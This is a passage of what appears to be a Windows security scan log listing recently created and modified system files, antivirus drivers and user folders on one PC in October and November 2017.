2017-10-13 14:06 - 2017-09-29 21:10 - 001150776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-10-13 14:06 - 2017-09-29 21:02 - 000175512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-10-13 14:06 - 2017-09-29 02:46 - 023678976 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-10-13 14:06 - 2017-09-29 02:44 - 000133120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2017-10-13 14:06 - 2017-09-29 02:43 - 000142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll
2017-10-13 14:06 - 2017-09-29 02:43 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll
2017-10-13 14:06 - 2017-09-29 02:39 - 020511232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-10-13 14:06 - 2017-09-29 02:39 - 011888640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-10-13 14:06 - 2017-09-29 02:38 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-10-13 14:06 - 2017-09-29 02:36 - 019337216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-10-13 14:06 - 2017-09-29 02:35 - 003654656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-10-13 14:06 - 2017-09-29 02:34 - 017370624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-10-13 14:06 - 2017-09-29 02:34 - 006255616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-10-13 14:06 - 2017-09-29 02:34 - 003669504 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-10-13 14:06 - 2017-09-29 02:33 - 000658944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-10-13 14:06 - 2017-09-29 02:33 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2017-10-13 14:06 - 2017-09-29 02:32 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-10-13 14:06 - 2017-09-29 02:32 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll
2017-10-13 14:06 - 2017-09-29 02:32 - 000128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-10-13 14:06 - 2017-09-29 02:32 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\usoapi.dll
2017-10-13 14:06 - 2017-09-29 02:32 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2017-10-13 14:06 - 2017-09-29 02:32 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll
2017-10-13 14:06 - 2017-09-29 02:32 - 000023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\mgmtapi.dll
2017-10-13 14:06 - 2017-09-29 02:31 - 000306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-10-13 14:06 - 2017-09-29 02:31 - 000168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-10-13 14:06 - 2017-09-29 02:31 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-10-13 14:06 - 2017-09-29 02:31 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\efssvc.dll
2017-10-13 14:06 - 2017-09-29 02:31 - 000052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-10-13 14:06 - 2017-09-29 02:30 - 023686144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-10-13 14:06 - 2017-09-29 02:30 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-10-13 14:06 - 2017-09-29 02:30 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-10-13 14:06 - 2017-09-29 02:30 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerCsp.dll
2017-10-13 14:06 - 2017-09-29 02:30 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-10-13 14:06 - 2017-09-29 02:30 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2017-10-13 14:06 - 2017-09-29 02:29 - 008333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-10-13 14:06 - 2017-09-29 02:29 - 000724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-10-13 14:06 - 2017-09-29 02:29 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2017-10-13 14:06 - 2017-09-29 02:29 - 000461824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2017-10-13 14:06 - 2017-09-29 02:29 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-10-13 14:06 - 2017-09-29 02:29 - 000304640 _____ (Microsoft Corporation) C:\WINDOWS\system32\dusmsvc.dll
2017-10-13 14:06 - 2017-09-29 02:29 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-10-13 14:06 - 2017-09-29 02:29 - 000083456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdbusenum.dll
2017-10-13 14:06 - 2017-09-29 02:29 - 000052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\ServiceWorkerHost.exe
2017-10-13 14:06 - 2017-09-29 02:28 - 000699904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-10-13 14:06 - 2017-09-29 02:28 - 000556032 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-10-13 14:06 - 2017-09-29 02:28 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-10-13 14:06 - 2017-09-29 02:28 - 000458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2017-10-13 14:06 - 2017-09-29 02:28 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-10-13 14:06 - 2017-09-29 02:28 - 000254976 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 012803072 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 001321984 ____R (The ICU Project) C:\WINDOWS\system32\icuuc.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 000616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 000565760 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 000538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 000524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 000409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptngc.dll
2017-10-13 14:06 - 2017-09-29 02:27 - 000350720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.dll
2017-10-13 14:06 - 2017-09-29 02:26 - 008213504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-10-13 14:06 - 2017-09-29 02:26 - 002809344 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-10-13 14:06 - 2017-09-29 02:26 - 001468928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-10-13 14:06 - 2017-09-29 02:26 - 001269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-10-13 14:06 - 2017-09-29 02:26 - 001197568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.CommonBridge.dll
2017-10-13 14:06 - 2017-09-29 02:26 - 001141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplySettingsTemplateCatalog.exe
2017-10-13 14:06 - 2017-09-29 02:26 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-10-13 14:06 - 2017-09-29 02:26 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2017-10-13 14:06 - 2017-09-29 02:26 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-10-13 14:06 - 2017-09-29 02:25 - 008199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-10-13 14:06 - 2017-09-29 02:25 - 004175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-10-13 14:06 - 2017-09-29 02:25 - 002760704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-10-13 14:06 - 2017-09-29 02:25 - 000586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-10-13 14:06 - 2017-09-29 02:24 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-10-13 14:06 - 2017-09-29 02:24 - 002503680 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-10-13 14:06 - 2017-09-29 02:24 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-10-13 14:06 - 2017-09-29 02:24 - 001628672 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2017-10-13 14:06 - 2017-09-29 02:24 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-10-13 14:06 - 2017-09-29 02:24 - 001201664 _____ (Microsoft Corporation) C:\WINDOWS\system32\AgentService.exe
2017-10-13 14:06 - 2017-09-29 02:24 - 000684032 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 004730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 003140096 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 002730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-10-13 14:06 - 2017-09-29 02:23 - 002446336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 002195968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.ModernAppAgent.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 002055680 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-10-13 14:06 - 2017-09-29 02:23 - 001887744 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 001605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 001460224 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 001398784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 001052672 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 000986624 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 000972288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 000841216 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 000756224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 000647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-10-13 14:06 - 2017-09-29 02:23 - 000512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2017-10-13 14:06 - 2017-09-29 02:22 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-10-13 14:06 - 2017-09-29 02:22 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-10-13 14:06 - 2017-09-29 02:22 - 001438208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2017-10-13 14:06 - 2017-09-29 02:22 - 000407040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-10-13 14:06 - 2017-09-29 02:21 - 003304448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2017-10-13 14:06 - 2017-09-29 02:21 - 000722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-10-13 14:06 - 2017-09-29 02:21 - 000476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2017-10-13 14:06 - 2017-09-29 02:21 - 000414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2017-10-13 14:06 - 2017-09-29 02:21 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2017-10-13 14:06 - 2017-09-29 02:21 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\regsvc.dll
2017-10-13 14:06 - 2017-09-29 02:21 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TabSvc.dll
2017-10-13 14:06 - 2017-09-29 02:21 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2017-10-13 14:06 - 2017-09-29 02:20 - 001811456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2017-10-13 14:06 - 2017-09-29 02:20 - 000804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2017-10-13 14:06 - 2017-09-29 02:20 - 000385536 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2017-10-13 14:06 - 2017-09-29 02:20 - 000286208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-10-13 14:06 - 2017-09-29 02:20 - 000194560 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll
2017-10-13 14:06 - 2017-09-29 02:20 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsiexe.dll
2017-10-13 14:06 - 2017-09-29 02:19 - 002088448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2017-10-13 14:06 - 2017-09-29 02:19 - 000325120 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2017-10-13 14:06 - 2017-09-29 02:19 - 000306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2017-10-13 14:06 - 2017-09-29 02:19 - 000208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2017-10-13 14:06 - 2017-09-29 02:18 - 002438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-10-13 14:06 - 2017-09-29 02:18 - 001527296 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-10-13 14:06 - 2017-09-29 02:18 - 000893440 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2017-10-13 14:06 - 2017-09-29 02:18 - 000603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2017-10-13 14:06 - 2017-09-29 02:18 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdechangepin.exe
2017-10-13 14:06 - 2017-09-29 02:18 - 000347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcbuilder.exe
2017-10-13 14:06 - 2017-09-29 02:18 - 000215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe
2017-10-13 14:06 - 2017-09-29 02:18 - 000141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2017-10-13 14:06 - 2017-09-29 02:18 - 000130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Robocopy.exe
2017-10-13 14:06 - 2017-09-29 02:18 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\cipher.exe
2017-10-13 14:06 - 2017-09-29 00:40 - 000804312 _____ C:\WINDOWS\SysWOW64\locale.nls
2017-10-13 14:06 - 2017-09-29 00:40 - 000804312 _____ C:\WINDOWS\system32\locale.nls
2017-10-13 14:06 - 2017-09-20 10:08 - 000640512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswstr10.dll
2017-10-13 14:06 - 2017-09-20 10:08 - 000345088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2017-10-13 14:06 - 2017-09-20 10:08 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjint40.dll
2017-10-13 14:06 - 2017-09-18 18:20 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-10-13 14:06 - 2017-09-18 18:20 - 000900376 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-10-13 14:06 - 2017-09-18 18:18 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-10-13 14:06 - 2017-09-18 18:17 - 001395664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-10-13 14:06 - 2017-09-18 18:17 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-10-13 14:06 - 2017-09-18 18:17 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-10-13 14:06 - 2017-09-18 18:11 - 001018272 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-10-13 14:06 - 2017-09-18 17:26 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringclient.dll
2017-10-13 14:06 - 2017-09-18 17:25 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\system32\eShims.dll
2017-10-13 14:06 - 2017-09-18 17:23 - 000210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringservice.dll
2017-10-13 14:06 - 2017-09-18 17:20 - 000831488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2017-10-12 14:12 - 2017-10-29 23:33 - 000000000 ____D C:\Program Files\Mozilla Firefox
2017-10-12 14:08 - 2017-10-12 14:08 - 000245736 _____ (Mozilla) C:\Users\Charlie\Downloads\Firefox Installer.exe
2017-10-11 19:18 - 2017-10-11 19:18 - 000167919 _____ C:\Users\Charlie\Desktop\bookmarks-2017-10-11.json
2017-10-11 13:05 - 2017-10-11 13:05 - 126925120 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT-KB890830.exe
2017-10-11 11:08 - 2017-10-11 11:08 - 001361928 _____ C:\Users\Charlie\Downloads\PDFByteStreamer(2).pdf
2017-10-11 11:08 - 2017-10-11 11:08 - 000065959 _____ C:\Users\Charlie\Downloads\v400(2).pdf
2017-10-11 10:33 - 2017-10-11 10:33 - 001162401 _____ C:\Users\Charlie\Downloads\downloadPDF(1).pdf
2017-10-11 01:17 - 2017-10-11 01:17 - 000063695 _____ C:\Users\Charlie\Downloads\Level I ID Screen Revised Jan 2016.pdf
2017-10-11 01:08 - 2017-10-11 01:08 - 003246181 _____ C:\Users\Charlie\Downloads\3871B form Revised 2016(1).pdf

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-11-10 16:12 - 2017-09-02 02:43 - 000000000 ____D C:\Users\Charlie
2017-11-10 16:10 - 2017-09-02 03:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-11-10 16:10 - 2017-03-18 06:40 - 001310720 _____ C:\WINDOWS\system32\config\BBI
2017-11-10 15:09 - 2017-10-07 21:09 - 000094144 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-11-10 12:33 - 2017-09-02 03:05 - 000004162 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{24F6DFAD-F03B-41A2-9438-15B6B73060F2}
2017-11-10 12:17 - 2017-09-02 02:39 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-11-10 12:05 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Outlook Files
2017-11-10 07:13 - 2017-09-02 03:05 - 000003668 _____ C:\WINDOWS\System32\Tasks\AVG EUpdate Task
2017-11-10 06:47 - 2017-03-18 16:03 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-11-10 06:40 - 2015-11-09 23:03 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2017-11-09 21:01 - 2017-03-18 16:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-11-09 21:01 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-11-09 14:51 - 2017-02-13 08:52 - 000000000 ____D C:\Users\Charlie\Desktop\Noplock Contacts
2017-11-09 14:39 - 2016-01-19 08:44 - 000000000 ____D C:\Users\Charlie\AppData\Local\Packages
2017-11-09 11:38 - 2016-01-19 12:43 - 000000000 ____D C:\Users\Charlie\Desktop\MRN
2017-11-09 08:45 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Faith
2017-11-07 09:39 - 2017-03-18 16:01 - 000000000 ____D C:\WINDOWS\INF
2017-11-06 21:09 - 2016-01-19 12:43 - 000000000 ___RD C:\Users\Charlie\Desktop\Security & Utilities
2017-11-06 21:03 - 2017-06-04 09:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2017-11-06 20:53 - 2016-11-19 08:51 - 000000000 ____D C:\Users\Charlie\AppData\LocalLow\Mozilla
2017-11-06 20:48 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Finances
2017-11-06 10:26 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\My Data Sources
2017-11-04 21:22 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Retire
2017-11-04 07:42 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Farm
2017-11-04 06:58 - 2017-09-02 02:41 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-11-04 06:58 - 2016-01-19 08:44 - 000000000 __SHD C:\Users\Charlie\IntelGraphicsProfiles
2017-11-04 06:57 - 2017-10-07 21:09 - 000252232 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys
2017-11-04 06:57 - 2017-10-07 21:09 - 000045504 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-11-04 06:57 - 2017-08-28 13:43 - 000110016 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-11-01 20:49 - 2017-09-02 03:05 - 000003372 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1808445638-3246226358-2469192111-1000
2017-11-01 20:49 - 2016-01-19 08:47 - 000002417 _____ C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-11-01 20:49 - 2016-01-19 08:47 - 000000000 ___RD C:\Users\Charlie\OneDrive
2017-11-01 19:36 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-10-30 08:51 - 2016-01-19 12:40 - 000000000 ____D C:\Users\Charlie\AppData\Local\ElevatedDiagnostics
2017-10-29 23:33 - 2016-01-19 12:25 - 000000000 ____D C:\Program Files (x86)\Java
2017-10-29 23:33 - 2016-01-19 09:16 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-10-26 18:32 - 2017-06-04 08:47 - 001022288 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgsnx.sys
2017-10-25 16:45 - 2016-01-19 12:22 - 000000000 ____D C:\ProgramData\Oracle
2017-10-25 16:36 - 2016-01-19 12:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-10-25 16:33 - 2017-05-10 11:54 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2017-10-25 13:41 - 2015-11-09 22:54 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2017-10-25 08:06 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-10-25 08:06 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-10-23 06:31 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Quicken
2017-10-20 06:25 - 2017-09-02 03:05 - 000004008 _____ C:\WINDOWS\System32\Tasks\Antivirus Emergency Update
2017-10-20 06:24 - 2017-06-04 08:47 - 000579584 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000548568 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetSec.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000355856 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000336896 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbloga.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000314640 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdrivera.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000193768 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000192584 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsha.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000166624 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbdiska.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000140192 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000102792 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000076832 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000051336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniva.sys
2017-10-20 06:24 - 2017-06-04 08:47 - 000039424 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgHwid.sys
2017-10-20 06:24 - 2016-01-19 12:21 - 000000000 ____D C:\ProgramData\AVG
2017-10-18 09:00 - 2017-03-18 15:51 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-10-13 20:56 - 2016-01-19 08:44 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-10-13 20:55 - 2017-09-02 02:42 - 000937530 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-10-13 16:38 - 2017-09-02 02:39 - 000390864 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-10-13 16:34 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-10-13 16:34 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\Provisioning
2017-10-13 16:34 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2017-10-13 16:33 - 2017-03-18 16:03 - 000230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\msclmd.dll
2017-10-13 16:33 - 2017-03-18 16:03 - 000207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msclmd.dll
2017-10-12 19:21 - 2017-03-18 16:06 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-10-12 19:21 - 2017-03-18 16:06 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-10-12 14:12 - 2016-01-19 09:16 - 000001007 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-10-11 13:12 - 2016-01-19 13:10 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-10-11 13:05 - 2016-01-19 13:10 - 126925120 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

==================== Files in the root of some directories =======

2016-12-01 12:59 - 2016-11-30 12:02 - 000012542 _____ () C:\Program Files (x86)\Common Files\client.wyc
